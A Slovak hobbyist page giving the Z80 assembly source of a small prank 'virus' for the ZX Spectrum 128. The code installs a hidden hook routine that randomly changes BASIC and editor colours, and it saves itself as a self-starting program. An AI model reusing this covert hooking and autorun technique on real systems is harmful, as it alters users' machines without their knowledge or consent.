Virus pre Spektrum 128

Zdrojový kód


3   4000      *s
4   4000          org 23755
5   5ccb 3fff0080  z   dw  #ff3f,#8000
6   5ccf f8c0300e     db  #f8,#c0,'0',#0e
7   5cd3 0000d75c     dw  #00,run
8   5cd7 cd005b   run  call #5b00
9   5cda f3        di
10   5cdb 3ecd       ld  a,#cd
11   5cdd 320b5b      ld  (#5b0b),a
12   5ce0 2100bf      ld  hl,#bf00
13   5ce3 220c5b      ld  (#5b0c),hl
14   5ce6 21ffbe      ld  hl,#beff
15   5ce9 22b25c      ld  (23730),hl
16   5cec 21fa5c      ld  hl,rut
17   5cef 1100bf      ld  de,#bf00
18   5cf2 012000      ld  bc,k-rut
19   5cf5 edb0       ldir
20   5cf7 c39d01      jp  #019d
21   5cfa 325c5b   rut  ld  (#5b5c),a
22   5cfd f5        push af
23   5cfe 3e07       ld  a,#07
24   5d00 ed79       out (c),a
25   5d02 ed5f       ld  a,r
26   5d04 e638       and #38
27   5d06 fe20       cp  #20
28   5d08 3002       jr  nc,zz
29   5d0a f607       or  #07
30   5d0c 320fec   zz   ld  (#ec0f),a
31   5d0f 3211ec      ld  (#ec11),a
32   5d12 32485c      ld  (23624),a
33   5d15 328d5c      ld  (23693),a
34   5d18 f1        pop af
35   5d19 c9        ret
36   5d1a      k
37   5d1a      l   =  k-z
38   5d1a dd21315d  s   ld  ix,hlava
39   5d1e 111100      ld  de,#11
40   5d21 af        xor a
41   5d22 cdc604      call #04c6
42   5d25 dd21cb5c     ld  ix,z
43   5d29 114f00      ld  de,l
44   5d2c 3eff       ld  a,#ff
45   5d2e c3c604      jp  #04c6
46   5d31 00     hlava db  #00
47   5d32 56697275     db  'Virus 128 '
      73203132  
      3820    
48   5d3c 4f00ff3f     dw  l,16383,#00
      0000    

 hlava 5d31 * k   5d1a * l   004f * run  5cd7 *
 rut  5cfa * s   5d1a * z   5ccb * zz   5d0c *

Bytes:119 labels:8 errors:0  


Popis
Tento program nahodne meni trvale farby v basicu a farby vo full-screen 128 basic editore.

Poznámky
Funguje len v 128 basicu na Spektrach 128. Po prelozeni zdrojaku a spusteni od navestia "s" sa samotny virus sejvne ako samospustaci basic program.

Poslal
Busy